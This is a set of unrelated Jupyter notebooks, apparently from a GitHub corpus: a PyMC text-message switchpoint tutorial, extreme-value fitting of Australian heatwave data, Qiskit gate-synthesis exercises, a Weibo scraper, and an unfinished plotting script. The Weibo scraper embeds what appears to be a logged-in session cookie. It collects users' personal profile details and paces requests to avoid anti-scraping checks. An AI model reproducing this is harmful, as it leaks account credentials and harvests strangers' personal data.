> Another way of thinking about this: unlike a traditional program, which only runs in the forward directions, a probabilistic program is run in both the forward and backward direction. It runs forward to compute the consequences of the assumptions it contains about the world (i.e., the model space it represents), but it also runs backward from the data to constrain the possible explanations. In practice, many probabilistic programming systems will cleverly interleave these forward and backward operations to efficiently home in on the best explanations.
Because of the confusion engendered by the term *probabilistic programming*, I'll refrain from using it. Instead, I'll simply say *programming*, since that's what it really is.
PyMC code is easy to read. The only novel thing should be the syntax, and I will interrupt the code to explain individual sections. Simply remember that we are representing the model's components ($\tau, \lambda_1, \lambda_2$ ) as variables:
```
import pymc as pm
alpha = 1.0 / count_data.mean() # Recall count_data is the
# variable that holds our txt counts
print n_count_data
lambda_1 = pm.Exponential("lambda_1", alpha)
lambda_2 = pm.Exponential("lambda_2", alpha)
tau = pm.DiscreteUniform("tau", lower=0, upper=n_count_data)
lambda_1
```
In the code above, we create the PyMC variables corresponding to $\lambda_1$ and $\lambda_2$. We assign them to PyMC's *stochastic variables*, so-called because they are treated by the back end as random number generators. We can demonstrate this fact by calling their built-in `random()` methods.
```
print("Random output:", tau.random(), tau.random(), tau.random())
test = np.zeros(10)
print(test)
test[:3] = 3
test[3:] = -9
print(test)
@pm.deterministic
def lambda_(tau=tau, lambda_1=lambda_1, lambda_2=lambda_2):
out = np.zeros(n_count_data)
out[:tau] = lambda_1 # lambda before tau is lambda1
out[tau:] = lambda_2 # lambda after (and including) tau is lambda2
return out
```
This code creates a new function `lambda_`, but really we can think of it as a random variable: the random variable $\lambda$ from above. Note that because `lambda_1`, `lambda_2` and `tau` are random, `lambda_` will be random. We are **not** fixing any variables yet.
`@pm.deterministic` is a decorator that tells PyMC this is a deterministic function. That is, if the arguments were deterministic (which they are not), the output would be deterministic as well. Deterministic functions will be covered in Chapter 2.
```
observation = pm.Poisson("obs", lambda_, value=count_data, observed=True)
model = pm.Model([observation, lambda_1, lambda_2, tau])
```
The variable `observation` combines our data, `count_data`, with our proposed data-generation scheme, given by the variable `lambda_`, through the `value` keyword. We also set `observed = True` to tell PyMC that this should stay fixed in our analysis. Finally, PyMC wants us to collect all the variables of interest and create a `Model` instance out of them. This makes our life easier when we retrieve the results.
The code below will be explained in Chapter 3, but I show it here so you can see where our results come from. One can think of it as a *learning* step. The machinery being employed is called *Markov Chain Monte Carlo* (MCMC), which I also delay explaining until Chapter 3. This technique returns thousands of random variables from the posterior distributions of $\lambda_1, \lambda_2$ and $\tau$. We can plot a histogram of the random variables to see what the posterior distributions look like. Below, we collect the samples (called *traces* in the MCMC literature) into histograms.
```
# Mysterious code to be explained in Chapter 3.
mcmc = pm.MCMC(model)
mcmc.sample(40000, 10000, 1)
lambda_1_samples = mcmc.trace('lambda_1')[:]
lambda_2_samples = mcmc.trace('lambda_2')[:]
tau_samples = mcmc.trace('tau')[:]
figsize(12.5, 10)
# histogram of the samples:
ax = plt.subplot(311)
ax.set_autoscaley_on(False)
plt.hist(lambda_1_samples, histtype='stepfilled', bins=30, alpha=0.85,
label="posterior of $\lambda_1$", color="#A60628", normed=True)
plt.legend(loc="upper left")
plt.title(r"""Posterior distributions of the variables
$\lambda_1,\;\lambda_2,\;\tau$""")
plt.xlim([15, 30])
plt.xlabel("$\lambda_1$ value")
ax = plt.subplot(312)
ax.set_autoscaley_on(False)
plt.hist(lambda_2_samples, histtype='stepfilled', bins=30, alpha=0.85,
label="posterior of $\lambda_2$", color="#7A68A6", normed=True)
plt.legend(loc="upper left")
plt.xlim([15, 30])
plt.xlabel("$\lambda_2$ value")
plt.subplot(313)
w = 1.0 / tau_samples.shape[0] * np.ones_like(tau_samples)
plt.hist(tau_samples, bins=n_count_data, alpha=1,
label=r"posterior of $\tau$",
color="#467821", weights=w, rwidth=2.)
plt.xticks(np.arange(n_count_data))
plt.legend(loc="upper left")
plt.ylim([0, .75])
plt.xlim([35, len(count_data) - 20])
plt.xlabel(r"$\tau$ (in days)")
plt.ylabel("probability");
```
### Interpretation
Recall that Bayesian methodology returns a *distribution*. Hence we now have distributions to describe the unknown $\lambda$s and $\tau$. What have we gained? Immediately, we can see the uncertainty in our estimates: the wider the distribution, the less certain our posterior belief should be. We can also see what the plausible values for the parameters are: $\lambda_1$ is around 18 and $\lambda_2$ is around 23. The posterior distributions of the two $\lambda$s are clearly distinct, indicating that it is indeed likely that there was a change in the user's text-message behaviour.
What other observations can you make? If you look at the original data again, do these results seem reasonable?
Notice also that the posterior distributions for the $\lambda$s do not look like exponential distributions, even though our priors for these variables were exponential. In fact, the posterior distributions are not really of any form that we recognize from the original model. But that's OK! This is one of the benefits of taking a computational point of view. If we had instead done this analysis using mathematical approaches, we would have been stuck with an analytically intractable (and messy) distribution. Our use of a computational approach makes us indifferent to mathematical tractability.
Our analysis also returned a distribution for $\tau$. Its posterior distribution looks a little different from the other two because it is a discrete random variable, so it doesn't assign probabilities to intervals. We can see that near day 45, there was a 50% chance that the user's behaviour changed. Had no change occurred, or had the change been gradual over time, the posterior distribution of $\tau$ would have been more spread out, reflecting that many days were plausible candidates for $\tau$. By contrast, in the actual results we see that only three or four days make any sense as potential transition points.
### Why would I want samples from the posterior, anyways?
We will deal with this question for the remainder of the book, and it is an understatement to say that it will lead us to some amazing results. For now, let's end this chapter with one more example.
We'll use the posterior samples to answer the following question: what is the expected number of texts at day $t, \; 0 \le t \le 70$ ? Recall that the expected value of a Poisson variable is equal to its parameter $\lambda$. Therefore, the question is equivalent to *what is the expected value of $\lambda$ at time $t$*?
In the code below, let $i$ index samples from the posterior distributions. Given a day $t$, we average over all possible $\lambda_i$ for that day $t$, using $\lambda_i = \lambda_{1,i}$ if $t \lt \tau_i$ (that is, if the behaviour change has not yet occurred), else we use $\lambda_i = \lambda_{2,i}$.
```
figsize(12.5, 5)
# tau_samples, lambda_1_samples, lambda_2_samples contain
# N samples from the corresponding posterior distribution
N = tau_samples.shape[0]
expected_texts_per_day = np.zeros(n_count_data)
for day in range(0, n_count_data):
# ix is a bool index of all tau samples corresponding to
# the switchpoint occurring prior to value of 'day'
ix = day < tau_samples
# Each posterior sample corresponds to a value for tau.
# for each day, that value of tau indicates whether we're "before"
# (in the lambda1 "regime") or
# "after" (in the lambda2 "regime") the switchpoint.
# by taking the posterior sample of lambda1/2 accordingly, we can average
# over all samples to get an expected value for lambda on that day.
# As explained, the "message count" random variable is Poisson distributed,
# and therefore lambda (the poisson parameter) is the expected value of
# "message count".
expected_texts_per_day[day] = (lambda_1_samples[ix].sum()
+ lambda_2_samples[~ix].sum()) / N
plt.plot(range(n_count_data), expected_texts_per_day, lw=4, color="#E24A33",
label="expected number of text-messages received")
plt.xlim(0, n_count_data)
plt.xlabel("Day")
plt.ylabel("Expected # text-messages")
plt.title("Expected number of text-messages received")
plt.ylim(0, 60)
plt.bar(np.arange(len(count_data)), count_data, color="#348ABD", alpha=0.65,
label="observed texts per day")
plt.legend(loc="upper left");
```
Our analysis shows strong support for believing the user's behavior did change ($\lambda_1$ would have been close in value to $\lambda_2$ had this not been true), and that the change was sudden rather than gradual (as demonstrated by $\tau$'s strongly peaked posterior distribution). We can speculate what might have caused this: a cheaper text-message rate, a recent weather-to-text subscription, or perhaps a new relationship. (In fact, the 45th day corresponds to Christmas, and I moved away to Toronto the next month, leaving a girlfriend behind.)
##### Exercises
1\. Using `lambda_1_samples` and `lambda_2_samples`, what is the mean of the posterior distributions of $\lambda_1$ and $\lambda_2$?
```
print(lambda_1_samples.mean())
print(lambda_2_samples.mean())
```
2\. What is the expected percentage increase in text-message rates? `hint:` compute the mean of `lambda_1_samples/lambda_2_samples`. Note that this quantity is very different from `lambda_1_samples.mean()/lambda_2_samples.mean()`.
```
print(lambda_1_samples.mean()/lambda_2_samples.mean())
print(lambda_1_samples/lambda_2_samples).mean()
```
3\. What is the mean of $\lambda_1$ **given** that we know $\tau$ is less than 45. That is, suppose we have been given new information that the change in behaviour occurred prior to day 45. What is the expected value of $\lambda_1$ now? (You do not need to redo the PyMC part. Just consider all instances where `tau_samples < 45`.)
```
y = np.bincount(tau_samples)
print(y)
ii = np.nonzero(y)[0]
zip(ii,y[ii])
ix = tau_samples < 45
print(ix)
print(ix.sum())
print(len(ix))
lambda_1_samples[ix].mean()
```
### References
- [1] Gelman, Andrew. N.p.. Web. 22 Jan 2013. [N is never large enough](http://andrewgelman.com/2005/07/31/n_is_never_larg/).
- [2] Norvig, Peter. 2009. [The Unreasonable Effectiveness of Data](http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/35179.pdf).
- [3] Patil, A., D. Huard and C.J. Fonnesbeck. 2010.
PyMC: Bayesian Stochastic Modelling in Python. Journal of Statistical
Software, 35(4), pp. 1-81.
- [4] Jimmy Lin and Alek Kolcz. Large-Scale Machine Learning at Twitter. Proceedings of the 2012 ACM SIGMOD International Conference on Management of Data (SIGMOD 2012), pages 793-804, May 2012, Scottsdale, Arizona.
- [5] Cronin, Beau. "Why Probabilistic Programming Matters." 24 Mar 2013. Google, Online Posting to Google . Web. 24 Mar. 2013. <https://plus.google.com/u/0/107971134877020469960/posts/KpeRdJKR6Z1>.
```
from IPython.core.display import HTML
def css_styling():
styles = open("../styles/custom.css", "r").read()
return HTML(styles)
css_styling()
```
| github_jupyter |
```
import numpy as np
from scipy.stats import laplace
from scipy.optimize import minimize
import matplotlib.pyplot as plt
%matplotlib inline
from Master_Functions import CondExtBivNegLogLik
from DeltaLaplaceFuncs import DeltaLaplace
# For module development
%load_ext autoreload
%autoreload 2
print('\n'.join(f'{m.__name__} {m.__version__}' for m in globals().values() if getattr(m, '__version__', None)))
# Create toy data. We require X to be Laplace.
X = laplace(0,1).rvs(5000)
#We'll also let Z be Delta_Laplace noise
#Condition on X being larger than some high quantile u
u = np.quantile(X,0.95)
X = X[X>u]
Z = DeltaLaplace(loc =0.1,scale = 0.3,shape = 1).rvs(size=len(X), random_state = 2)
Y = 0.2 * X + Z*(X**0.8)
fig=plt.figure()
plt.scatter(X,Y)
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
## Fit distribution. We will use Delta-Laplace margins.If use_DL = False, uses Gaussian margins for residual.
init_par=[0.5,0.2,0.2,0.5,2]
X_data, Y_data = X,Y
use_DL = True
fit = minimize(fun = CondExtBivNegLogLik,x0 = init_par,
args=(X_data,Y_data,use_DL),
method="Nelder-Mead")
fit = minimize(fun = CondExtBivNegLogLik,x0 = fit.x,
args=(X_data,Y_data,use_DL),
method="BFGS")
fit
#Plot fit
from Master_Functions import plot_bivariate_condExt_fit
#This can be done using either the empirical residual quantiles or the parametric delta-Laplace quantiles. Choose between
#plot_type = ("Model","Empirical","Both")
#Other inputs:
#X,Y data for fitting - Can be unconditoned
#u - Threshold for conditional quantile Y| X > u. Should be greater than or equal to that used for fitting
#par_ests - parameter estimates. Only supports (alpha, beta, mu, sigma) or (alpha, beta, mu, sigma, delta)
#zoom - If True, plots only (X,Y)| X>u. Plots all data, otherwise.
u=min(X_data)
plot_bivariate_condExt_fit(X = X,Y = Y,u = u, par_ests = fit.x, probs = np.linspace(0.05,0.95,19),
plot_type = "Both", zoom = True)
```
# Using real data - Australian summer heatwaves (Wadsworth and Tawn, 2019)
```
import pandas as pd
df=pd.read_csv("data/Aus_Temp_Values.csv", index_col=[0])
coords=pd.read_csv("data/Aus_Temp_Coordinates.csv", index_col=[0])
print(df.shape)
df.head()
##5324 observations, Summer only (DJF), 1957-2014
##There are 72 observation locations, (lat,lon) coordinates given in coords
print(coords.shape)
coords.head()
n_locs = coords.shape[0]
```
Data has already undergone site-wise marginal transformation to standard Laplace and so no pre-processing is required.
```
#For a single-pair of sites
Cond_site_ind, Dep_site_ind = 2,3
X = df.iloc[:,Cond_site_ind]
Y = df.iloc[:,Dep_site_ind]
#Condition on X > u. We take u to be the 90% quantile.
u = np.quantile(X, 0.9)
X_data = X[X > u]
Y_data = Y[X > u]
fig , axs = plt.subplots(1,2, figsize=(9, 4))
axs[0].scatter(X,Y, alpha = 0.5)
axs[1].scatter(X_data,Y_data, alpha = 0.5)
axs[0].set(xlabel="X", ylabel="Y")
axs[1].set(xlabel="X", ylabel="Y")
axs[0].set_title("(X,Y)")
axs[1].set_title("(X,Y)| X > %.1f" %u)
plt.show()
## Fit bivariate Heff. and Tawn. Use Delta-Laplace margins.
init_par=[0.5,0.6,0.2,0.2,1]
use_DL = True
fit = minimize(fun = CondExtBivNegLogLik,x0 = init_par,
args=(X_data,Y_data,use_DL),
method="Nelder-Mead")
fit = minimize(fun = CondExtBivNegLogLik,x0 = fit.x,
args=(X_data,Y_data,use_DL),
method="BFGS")
fit.x
#Plot fit
u=min(X_data)
plot_bivariate_condExt_fit(X = X,Y = Y,u = u, par_ests = fit.x, probs = np.linspace(0.05,0.95,19),
plot_type = "Both", zoom = False)
# Fit with less dependence
Cond_site_ind, Dep_site_ind = 0,71
X = df.iloc[:,Cond_site_ind]
Y = df.iloc[:,Dep_site_ind]
u = np.quantile(X, 0.9)
X_data = X[X > u]
Y_data = Y[X > u]
init_par=[0.3,0.6,0.2,0.2,1]
use_DL = True
fit = minimize(fun = CondExtBivNegLogLik,x0 = init_par,
args=(X_data,Y_data,use_DL),
method="Nelder-Mead")
fit = minimize(fun = CondExtBivNegLogLik,x0 = fit.x,
args=(X_data,Y_data,use_DL),
method="BFGS")
u=min(X_data)
plot_bivariate_condExt_fit(X = X,Y = Y,u = u, par_ests = fit.x, probs = np.linspace(0.05,0.95,19), plot_type = "Both", zoom = True)
print(fit.x)
#Small alpha and beta, so very low dependence. We would expect Y| X > u to be approximately standard Laplace.
from scipy.stats import laplace
dist=laplace()
plt.hist(Y_data, 50, density = True)
plt.title('Y| X > u')
probs=dist.pdf(np.linspace(-8,8,100))
plt.plot(np.linspace(-8,8,100),probs)
plt.show()
#And for the highly dependent pair?
Cond_site_ind, Dep_site_ind = 2,3
X = df.iloc[:,Cond_site_ind]
Y = df.iloc[:,Dep_site_ind]
u = np.quantile(X, 0.9)
X_data = X[X > u]
Y_data = Y[X > u]
plt.hist(Y_data, 50, density = True)
plt.title('Y| X > u')
probs=dist.pdf(np.linspace(-8,8,100))
plt.plot(np.linspace(-8,8,100),probs)
plt.show()
```
| github_jupyter |
# Basic Synthesis of Single-Qubit Gates
```
from qiskit import *
from qiskit.tools.visualization import plot_histogram
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
import numpy as np
```
## 1
Show that the Hadamard gate can be written in the following two forms
$$H = \frac{X+Z}{\sqrt{2}} \equiv \exp\left(i \frac{\pi}{2} \, \frac{X+Z}{\sqrt{2}}\right).$$
Here $\equiv$ is used to denote that the equality is valid up to a global phase, and hence that the resulting gates are physically equivalent.
Hint: it might even be easiest to prove that $e^{i\frac{\pi}{2} M} \equiv M$ for any matrix whose eigenvalues are all $\pm 1$, and that such matrices uniquely satisfy $M^2=I$.
## 2
The Hadamard can be constructed from `rx` and `rz` operations as
$$ R_x(\theta) = e^{i\frac{\theta}{2} X}, ~~~ R_z(\theta) = e^{i\frac{\theta}{2} Z},\\ H \equiv \lim_{n\rightarrow\infty} \left( ~R_x\left(\frac{\theta}{n}\right) ~~R_z \left(\frac{\theta}{n}\right) ~\right)^n.$$
For some suitably chosen $\theta$. When implemented for finite $n$, the resulting gate will be an approximation to the Hadamard whose error decreases with $n$.
The following shows an example of this implemented with Qiskit with an incorrectly chosen value of $\theta$ (and with the global phase ignored).
* Determine the correct value of $\theta$.
* Show that the error (when using the correct value of $\theta$) decreases quadratically with $n$.
```
q = QuantumRegister(1)
c = ClassicalRegister(1)
error = {}
for n in range(1,11):
# Create a blank circuit
qc = QuantumCircuit(q,c)
# Implement an approximate Hadamard
theta = np.pi # here we incorrectly choose theta=pi
for j in range(n):
qc.rx(theta/n,q[0])
qc.rz(theta/n,q[0])
# We need to measure how good the above approximation is. Here's a simple way to do this.
# Step 1: Use a real hadamard to cancel the above approximation.
# For a good approximatuon, the qubit will return to state 0. For a bad one, it will end up as some superposition.
qc.h(q[0])
# Step 2: Run the circuit, and see how many times we get the outcome 1.
# Since it should return 0 with certainty, the fraction of 1s is a measure of the error.
qc.measure(q,c)
shots = 20000
job = execute(qc, Aer.get_backend('qasm_simulator'),shots=shots)
try:
error[n] = (job.result().get_counts()['1']/shots)
except:
pass
plot_histogram(error)
```
## 3
An improved version of the approximation can be found from,
$$H \equiv \lim_{n\rightarrow\infty} \left( ~ R_z \left(\frac{\theta}{2n}\right)~~ R_x\left(\frac{\theta}{n}\right) ~~ R_z \left(\frac{\theta}{2n}\right) ~\right)^n.$$
Implement this, and investigate the scaling of the error.
```
import qiskit
qiskit.__qiskit_version__
```
| github_jupyter |
@[TOC]
## 库
```
import os
import csv
import requests
import xlwt
import re
import json
import time
```
### 配置
```
#根据个人浏览器信息进行修改
headers = {
'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Mobile Safari/537.36'
,
'Cookie': '_T_WM=67706607048; WEIBOCN_FROM=1110006030; ALF=1582777481; SCF=AqQddu0eGCw6Wh1xPsTyigWBFJH-P0ACsyLUFzNakys5tF6kBCjVpv4O6BDEGM4gShv5JHfuyjMoLBKfT5-Xwsc.; SUB=_2A25zK8jDDeRhGeNP41UT9yjIyj6IHXVQ1-iLrDV6PUJbktAKLUHSkW1NTk4PgJoxaitdQXaQL6znAIMdvJJs4-5l; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5q.Hx0pIs7PKpACzdnFYSZ5JpX5K-hUgL.Fo-p1hMES0qXeKz2dJLoIpUeBc8EdFH8SC-4BbHFSFH81F-RSF-4Sntt; SUHB=0qjEKc2Va_YMLH; SSOLoginState=1580185747; MLOGIN=1; XSRF-TOKEN=607e98; M_WEIBOCN_PARAMS=luicode%3D10000011%26lfid%3D2304135671786192_-_WEIBO_SECOND_PROFILE_WEIBO%26fid%3D2304135671786192_-_WEIBO_SECOND_PROFILE_WEIBO%26uicode%3D10000011'
#'ALF=1581501545; _T_WM=67706607048; H5_wentry=H5; backURL=https%3A%2F%2Fm.weibo.cn%2Fapi%2Fcomments%2Fshow%3Fid%3DIr5j4iRXW%26page%3D3; XSRF-TOKEN=11216a; WEIBOCN_FROM=1110006030; MLOGIN=1; SSOLoginState=1580006602; SCF=AqQddu0eGCw6Wh1xPsTyigWBFJH-P0ACsyLUFzNakys5zFt06rZeA1gEI0iP7HfWxZntbpMr8WTWhrxEdSVGB58.; SUB=_2A25zKIyaDeRhGeNP41UT9yjIyj6IHXVQ0hTSrDV6PUJbktAKLRL-kW1NTk4PgHLYgtoeuxFzuGDIDcybzoEoXvq9; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5q.Hx0pIs7PKpACzdnFYSZ5JpX5KzhUgL.Fo-p1hMES0qXeKz2dJLoIpUeBc8EdFH8SC-4BbHFSFH81F-RSF-4Sntt; SUHB=0IIlrfWMMkVsTI; M_WEIBOCN_PARAMS=uicode%3D20000174'
}
#文件保存地址
addrRoot='C:/Users/cascara/Desktop/seedcup/csv/blog/'
#是否获取转发者具体个人信息
getConcreteInfoList=True#False#True#
isLogin=True#False#True
#是否登入采集个人信息
#无信息打印字符
infoNoExistStr='未知'
#是否处理微博文本内容
processText = True
```
### 构造表格,采集数据内容(修改这里获取想要的信息)
```
#获取个人具体信息范围、排列
infoRangeDict={
'性别':True,
'所在地':True,
'生日':False,
'家乡':False,
'公司':True,
'大学':True,
'昵称':False,
'简介':False,
'注册时间':False,
'阳光信用':False,
#若无信息显示
'infoNoExist':'未知'
}
```
```
#获取博文信息范围、排列
blogRangeDict={
'visible': False,#{type: 0, list_id: 0}
'created_at': True,#"20分钟前"
'id': False,#"4466073829119710"
'idstr': False,#"4466073829119710"
'mid': False,#"4466073829119710"
'can_edit': False,#false
'show_additional_indication': False,#0
'text': True,#"【情况通报】2019年12月31日,武汉市卫健部门发布关于肺炎疫情的情况通报。
'textLength': False,#452
'source': False,#"360安全浏览器"
'favorited': False,#false
'pic_types': False,#""
'is_paid': False,#false
'mblog_vip_type': False,#0
'user': False,#{id: 2418542712, screen_name: "平安武汉",…}
'reposts_count': True,#1035
'comments_count': True,#1886
'attitudes_count': True,#7508
'pending_approval_count': False,#0
'isLongText': False,#true
'reward_exhibition_type':False,# 0
'hide_flag': False,#0
'mblogtype': False,#0
'more_info_type': False,#0
'cardid': False,#"star_11247_common"
'content_auth': False,#0
'pic_num': False,#0
#若无相关信息,则显示:
'infoNoExist':'未知'
}
```
```
#获取博主信息范围、排列
userRangeDict={
'id':True,# 1323527941
'screen_name': True,#"Vista看天下"
'profile_image_url': False,#"https://tva2.sinaimg.cn/crop.0.0.180.180.180/4ee36f05jw1e8qgp5bmzyj2050050aa8.jpg?KID=imgbed,tva&Expires=1580290462&ssig=xPIoKDRR56"
'profile_url':False,# "https://m.weibo.cn/u/1323527941?uid=1323527941&luicode=10000011&lfid=1076031323527941"
'statuses_count': False,#微博数 77256
'verified': False,#true
'verified_type':False,# 3
'verified_type_ext': False,#0
'verified_reason': False,#"《Vista看天下》官方微博"
'close_blue_v': False,#false
'description': True,#"一个有趣的蓝V"
'gender': True,# "m"
'mbtype': False,#12
'urank': False,#48
'mbrank': False,#6
'follow_me':False,# false
'following':False,# false
'followers_count': True,#19657897
'follow_count': True,#1809
'cover_image_phone': False,#"https://tva1.sinaimg.cn/crop.0.0.640.640.640/549d0121tw1egm1kjly3jj20hs0hsq4f.jpg"
'avatar_hd': False,#"https://ww2.sinaimg.cn/orj480/4ee36f05jw1e8qgp5bmzyj2050050aa8.jpg"
'like': False,#false
'like_me': False,#false
'badge': False,#{enterprise: 1, gongyi_level: 1, bind_taobao: 1, dzwbqlx_2016: 1, follow_whitelist_video: 1,…}
#若无信息显示
'infoNoExist':'未知'
}
```
### 文件命名
```
def addrFile(tweeter,suffix):
path=addrRoot+str(tweeter)+'/'
if os.path.exists(path) is False:
os.makedirs(path)
address=path+tweeter+suffix+'.csv'
return address
```
### 生成信息标题
```
def getInfoTitle(Dict,prefix):
titleList=[]
for item in Dict:
if(Dict.get(item) is True):
titleList.append(prefix+item)
return (titleList)
```
## 工具类,用来去除爬取的正文中一些不需要的链接、标签等
```
#工具类,用来去除爬取的正文中一些不需要的链接、标签等
class Tool:
deleteImg = re.compile('<img.*?>')
newLine =re.compile('<tr>|<div>|</tr>|</div>')
deleteAite = re.compile('//.*?:')
deleteAddr = re.compile('<a.*?>.*?</a>|<a href='+'\'https:')
deleteTag = re.compile('<.*?>')
deleteWord = re.compile('回复@|回覆@|回覆|回复')
@classmethod
def replace(cls,x):
x = re.sub(cls.deleteWord,'',x)
x = re.sub(cls.deleteImg,'',x)
x = re.sub(cls.deleteAite,'',x)
x = re.sub(cls.deleteAddr, '', x)
x = re.sub(cls.newLine,'',x)
x = re.sub(cls.deleteTag,'',x)
return x.strip()
```
### 构造微博内容的url
```
###某微博账户的全部微博内容
def contentURL(id,pages):
i=0
urls=[]
for page in pages:
if page is not 0:
urls+=['https://m.weibo.cn/api/container/getIndex?containerid=230413'+str(id)+'_-_WEIBO_SECOND_PROFILE_WEIBO&page_type=03&page='+str(page)]
return urls
#将字典类型的信息格式传递为需要的信息列表
def getInfoList(infoDict,rangeDict):
infoList=[]
for item in rangeDict:
if rangeDict.get(item) is True:
content=infoDict.get(item)
if content is not None:
#处理微博文本内容
if item =='text':
if processText is True:
content=Tool.replace(content)
infoList.append(content)
else:
infoList.append(rangeDict['infoNoExist'])
return infoList
```
### 观测对每个转发微博的影响
```
###在已有的一系列urls中进行操作
###筛选出微博转发内容进行操作
def reRatio(urls,csvWriter):
notEnd= True
retweetBlogTitle=getInfoTitle(blogRangeDict,'转发')#转发博文信息标题
retweetUserTitle=getInfoTitle(userRangeDict,'转发')#转发博主信息标题
originBlogTitle=getInfoTitle(blogRangeDict,'原文')#原文博文信息标题
originUserTitle=getInfoTitle(userRangeDict,'原文')#原文博主信息标题
infoTitle=getInfoTitle(infoRangeDict,'')#原文博主个人主页信息标题
#写表格的标题
if getConcreteInfoList is True:
csvWriter.writerow(retweetBlogTitle+retweetUserTitle+originBlogTitle+originUserTitle+infoTitle)
else:
csvWriter.writerow(retweetBlogTitle+retweetUserTitle+originBlogTitle+originUserTitle)
for url in urls:
response = requests.get(url,headers=headers)
resjson = json.loads(response.text)
cards=resjson['data']['cards']
#print(cards)
#结束最后
if(len(cards)==1):
notEnd=False
break
#遍历一个页面的所有微博
for card in cards:
try:
#转发博文与博主信息
retweetBlogInfoDict=card['mblog']
retweetUserInfoDict=retweetBlogInfoDict['user']
#筛选出转发的微博
try:
originBlogInfoDict=retweetBlogInfoDict['retweeted_status']
if originBlogInfoDict is not None:
#转发博文原文与博主信息
originUserInfoDict=originBlogInfoDict['user']
retweetUserID=retweetUserInfoDict['id']
originUserID=originUserInfoDict['id']
###不是转发自己的微博,则选中进行处理
if(retweetUserID!=originUserID):
infoList=[]
#转发博文数据
retweetBlogInfoList=getInfoList(retweetBlogInfoDict,blogRangeDict)
infoList+=retweetBlogInfoList
#转发博主数据
##默认已知
retweetUserInfoList=getInfoList(retweetUserInfoDict,userRangeDict)
infoList+=retweetUserInfoList
#原文博文数据
originBlogInfoList=getInfoList(originBlogInfoDict,blogRangeDict)
infoList+=originBlogInfoList
#原文博主数据
originUserInfoList=getInfoList(originUserInfoDict,userRangeDict)
infoList+=originUserInfoList
#originUserID为原文账号的ID
#可在此对id进行信息采集
if getConcreteInfoList is True:
infoDict=getInfo(isLogin,originUserID)
otherInfoList=getInfoList(infoDict,infoRangeDict)
infoList+=otherInfoList
#print(infoList)
#保存数据至csv
csvWriter.writerow(infoList)
#不断获取该博主对的影响力
#break
except:
pass
except:
pass
#延时,防止反爬
time.sleep(3)
return notEnd
```
### 获取个人主页中信息
```
def drillInfo(txt):
keyInfo={}
try:
resjson = json.loads(txt)
infodata = resjson.get('data')
cards = infodata.get('cards')
for l in range(0,len(cards)):
temp = cards[l]
card_group = temp.get('card_group')
#判断获取信息类型
for card in card_group:
#将信息传入字典
name=card.get('item_name')
if name is not None:
content=card.get('item_content')
keyInfo[name]=content
except:
pass
return keyInfo
```
### 构建通过id访问个人主页的url
```
def infoUrl(id):
url = "https://m.weibo.cn/api/container/getIndex?containerid=230283"+str(id)+"_-_INFO"
return url
```
## 爬取某id博主的个人信息
```
def getInfo(state,id):
address=addrRoot+'info/'+str(state)+'id'+str(id)+'.txt'
path=addrRoot+'info/'
if os.path.exists(path) is False:
os.makedirs(path)
try:
#已有文件
if(os.path.exists(address)==True):
fp = open(address,'r',encoding='utf-16')
txt=fp.read()
info=drillInfo(txt)
fp.close()
else:
fp = open(address,'w+',encoding='utf-16')
url=infoUrl(id)
if state is True:
response = requests.get(url,headers=headers)
else:
response = requests.get(url)
txt=response.text
fp.write(response.text)
info=drillInfo(txt)
fp.close()
except:
info=-1
return info
```
```
def getExatInfo(item,state,id):
info=getInfo(state,id)
content=info.get(item)
if content is not None:
return content
else:
return infoNoExistStr
### 构造热门界面访问
def downloadData(id):
tweeter=getExatInfo('昵称',2,int(id))
batch=0
while(1):
fileAddr=addrFile(tweeter,'batch'+str(batch))
if os.path.exists(fileAddr) is True:
print(fileAddr+'已存在,跳过采集')
else:
print('文件将写入:'+fileAddr)
fp = open(fileAddr,'w+',newline='',encoding='utf-16')
writer=csv.writer(fp)
if reRatio(contentURL(id,range(20*batch,20*(batch+1))),writer) is False:
fp.close()
break
fp.close()
print('第'+str(batch)+'批数据已记录完毕')
batch+=1
```
```
id=input('博主id:')
downloadData(id)
```
| github_jupyter |
```
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import time
from IPython.display import clear_output
import ipywidgets as widgets
import os
plt.rcParams["figure.figsize"] = (16,8)
dirs = [d for d in os.listdir('.') if os.path.isdir(d)]
dirs = np.sort(dirs)
wFolder = widgets.Dropdown(
options=dict(zip(dirs,dirs)),
description='Experiment:',
)
display(wFolder)
experimentFolder = wFolder.value
nodesAmount = 0
dirs = [d for d in os.listdir(experimentFolder) if os.path.isdir(os.path.join(experimentFolder,d))]
for d in dirs:
if 'worker' in d:
nodesAmount += 1
print("Learners amount is ", str(nodesAmount))
```
Coordinator files
```
communication = []
files = []
allFiles = [f for f in os.listdir(os.path.join(experimentFolder, "coordinator", "communication"))]
for file in allFiles:
files.append(open(os.path.join(experimentFolder, "coordinator","communication", file), "r"))
files
# coordinator
data_sendModel = files[0]#.read()
data_violations = files[1]#.read()
data_registrations = files[2]#.read()
```
## Plot
```
files = []
timestamps = []
for i in range(nodesAmount):
files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
timestamps.append([])
t = [0]
commonStep = 0
displayStep = 1
recordStep = 1
recordUnique = True
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
fig = plt.figure()
fig, ax = plt.subplots(1)
while 1:
for i in range(nodesAmount):
file = files[i]
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
timestamps[i].append(float(line.split('\t')[0]))
currentStep = min([len(ts) for ts in timestamps]) #minimum not needed? just length of any list; because above always one timestamp gets inserted per worker
if currentStep > commonStep: #if everywhere has been written something
commonStep = currentStep
# get synchr timestamp
# MAYBE IT IS NOT NECESSARY TO CHECK ALL OF THE TIME STAMPS BUT JUST TAKE THOSE OF LAST WORKER...
# now need to find the largest timestamp; so first of all the worker with most of the time stamps and in there the largest
if sum(np.array([len(ts) for ts in timestamps])-max([len(ts) for ts in timestamps]))==0: #then all lengths are equal
#print("equal lengths")
#print(timestamps)
time_step = float(np.amax(timestamps))
#print("maximal time step: " + str(time_step))
else:
#print("")
#print("different lengths")
#print("")
min_length = min([len(ts) for ts in timestamps])
# cut lists until min length and take maximal time stamp
